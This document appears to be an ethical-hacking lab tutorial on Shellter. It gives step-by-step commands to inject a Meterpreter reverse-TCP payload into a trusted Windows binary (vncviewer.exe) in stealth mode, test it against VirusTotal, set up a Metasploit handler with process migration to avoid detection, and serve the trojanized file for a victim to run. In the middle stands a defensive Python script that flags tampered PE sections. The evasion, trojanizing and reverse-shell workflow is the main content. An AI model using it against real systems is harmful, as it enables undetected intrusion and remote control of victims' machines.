Shellter is an antimalware evasion tool that is commonly used by ethical hackers and penetration testers to automate the process of creating and encoding custom payloads to evade threat detection systems. Shellter handles the generation of shellcode and injects it into a trusted Microsoft Windows 32-bit application. When the resulting file is executed on a targeted system, the trusted application runs as if it were benign, while the custom payload (shellcode) executes in the background within that process's memory space.
Installation:
sudo apt update
sudo apt install shellter

Configuration of shellter:
- Configure the working environment for Shellter and install Wine32:
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32
- List all the Windows binaries shipped with Kali Linux:
ls -l /usr/share/windows-binaries/

- Next, use the following command to copy the vncviewer.exe file to the current working directory; it is a good candidate because it is perceived as a harmless file:
cp /usr/share/windows-binaries/vncviewer.exe /home/kali

- Restart the machine once so that the changes made above take effect.
Using Shellter:
- Next, use the following command to launch the Shellter application on Kali Linux:
sudo shellter
- When the Shellter window appears, you are given the option to run Shellter in automatic or manual mode. Type A and hit Enter to select automatic mode:

In automatic mode, Shellter dynamically analyzes the Portable Executable (PE) file to identify a suitable injection point, whereas manual mode offers more control to the user.
- Specify the vncviewer.exe file within the /home/kali/ directory.
To learn more about PE format, please visit https://learn.microsoft.com/en-us/windows/win32/debug/pe-format.
- Shellter determines where it can inject shellcode within the PE file. Once this process is complete, type Y and hit Enter to enable stealth mode, choose L for listed payloads, then choose meterpreter_reverse_tcp by index 1, then set LHOST and LPORT:
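The injection-point step above depends entirely on PE structure, which is also what an analyst inspects when deciding whether a "trusted" binary has been tampered with. The following Python script is an added example and is not part of the original tutorial, nor is it Shellter's code or a description of Shellter's output. It walks the DOS header, PE signature, COFF header and section table, computes Shannon entropy per section, and reports three generic triage indicators a defender looks for in a modified executable: a section that is both writable and executable, an executable section with packed-looking (high-entropy) content, and an entry point that does not fall in .text. The two PE images are constructed in memory as fixtures (they are not loadable programs), and the 7.0 entropy threshold and the ".text" expectation are the example's own assumptions.

```python
import math
import struct
from collections import namedtuple

# IMAGE_SCN_* section flags from the PE/COFF specification.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
HIGH_ENTROPY = 7.0  # assumed threshold: compressed or encrypted data usually exceeds it

Section = namedtuple("Section", "name vaddr vsize rptr rsize chars entropy")

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, 8.0 for a uniform spread."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def parse_sections(pe: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    # AddressOfEntryPoint is at offset 16 of both PE32 and PE32+ optional headers.
    entry_point = struct.unpack_from("<I", pe, coff + 20 + 16)[0]
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr, rsize, rptr = struct.unpack_from("<IIII", pe, off + 8)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        raw = pe[rptr:rptr + rsize]
        sections.append(Section(name, vaddr, vsize, rptr, rsize, chars, shannon_entropy(raw)))
    return entry_point, sections

def analyze_pe(pe: bytes) -> dict:
    """Parsed sections plus generic triage findings (RWX, packed code, odd entry point)."""
    entry_point, sections = parse_sections(pe)
    findings, entry_section = [], None
    for s in sections:
        if s.vaddr <= entry_point < s.vaddr + max(s.vsize, s.rsize):
            entry_section = s
        if s.chars & IMAGE_SCN_MEM_WRITE and s.chars & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"section {s.name} is both writable and executable")
        if s.chars & IMAGE_SCN_MEM_EXECUTE and s.entropy > HIGH_ENTROPY:
            findings.append(f"executable section {s.name} has high entropy ({s.entropy:.2f})")
    if entry_section is None:
        findings.append(f"entry point 0x{entry_point:x} lies outside every section")
    elif entry_section.name != ".text":
        findings.append(f"entry point 0x{entry_point:x} is in {entry_section.name}, not .text")
    return {"entry_point": entry_point, "sections": sections, "findings": findings}

def build_pe(sections, entry_point: int) -> bytes:
    """Constructed fixture: minimal PE32 headers around (name, flags, raw bytes) triples."""
    file_align, size_of_optional = 0x200, 224
    headers_len = 0x40 + 4 + 20 + size_of_optional + 40 * len(sections)
    raw_start = -(-headers_len // file_align) * file_align
    dos = bytearray(b"MZ").ljust(0x40, b"\0")
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x0102)
    optional = bytearray(size_of_optional)
    struct.pack_into("<H", optional, 0, 0x10B)  # PE32 magic
    struct.pack_into("<I", optional, 16, entry_point)
    table, blobs, vaddr, rptr = bytearray(), bytearray(), 0x1000, raw_start
    for name, chars, data in sections:
        rsize = -(-len(data) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), vaddr, rsize, rptr,
                             0, 0, 0, 0, chars)
        blobs += data.ljust(rsize, b"\0")
        vaddr += max(0x1000, -(-len(data) // 0x1000) * 0x1000)
        rptr += rsize
    image = bytes(dos) + b"PE\0\0" + coff + bytes(optional) + bytes(table)
    return image.ljust(raw_start, b"\0") + bytes(blobs)

# Constructed fixtures: a conventional layout, and one exhibiting all three indicators.
CLEAN_PE = build_pe([(".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, b"\x90" * 100 + b"\xc3"),
                     (".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE, b"hello\0")], 0x1000)
SUSPICIOUS_PE = build_pe([(".text", IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ, bytes(range(256)) * 4),
                          (".data", IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE,
                           b"\xcc" * 64)], 0x2000)

if __name__ == "__main__":
    for label, image in (("clean", CLEAN_PE), ("suspicious", SUSPICIOUS_PE)):
        print(label, analyze_pe(image)["findings"] or ["no findings"])
```

To triage a real file, read it with open(path, "rb").read() and pass the bytes to analyze_pe; comparing the section table of a downloaded copy against the hash and layout of the original shipped in /usr/share/windows-binaries/ is the quickest way to see that a "trusted" binary is no longer the vendor's.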

- Once Shellter finishes, hit Enter to continue:

- Upload the encoded vncviewer.exe to VirusTotal for analysis:

Setting up a Meterpreter listener:
kali@kali:~$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.30.1.50
msf6 exploit(multi/handler) > set LPORT 5678
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
msf6 exploit(multi/handler) > exploit

COMMAND BREAKDOWN:
- The windows/meterpreter/reverse_tcp payload ensures that, when a connection is detected, Metasploit sends this payload to the targeted system, where it executes in memory and creates a reverse shell back to the Kali Linux machine.
- The LHOST and LPORT parameters set the local IP address and listening port on Kali Linux.
- The AutoRunScript post/windows/manage/migrate option ensures that, once a connection has been established from the victim system to Kali Linux, Metasploit automatically migrates the Meterpreter session into another process on the targeted system to reduce detection.
- The exploit command executes a payload or exploit module within Metasploit.
Delivery:
- Deliver the vncviewer.exe payload to our Windows 10 Enterprise machine, THESPIDERMAN. We will use the Python http module to do that; run the following command in the terminal:
python3 -m http.server 8000
- On the target Windows machine, open a browser and go to the Kali Linux machine's IP address on port 8000. Use whichever network you created; mine is on the 172.30.1.0/24 network.
The Python3 web server lets us download files from the Kali Linux machine onto other systems within our lab environment.
- Download the file and execute it.
- We will get a reverse shell back to our listener:

Not all Windows-based executables will work with Shellter. When working with Shellter, it is important to ensure the PE file that is encoded with shellcode from Shellter executes long enough on the targeted system for the staged payload to be delivered from Kali Linux to the target. Keep in mind that executables that are heavily protected or use non-standard PE structures might pose challenges.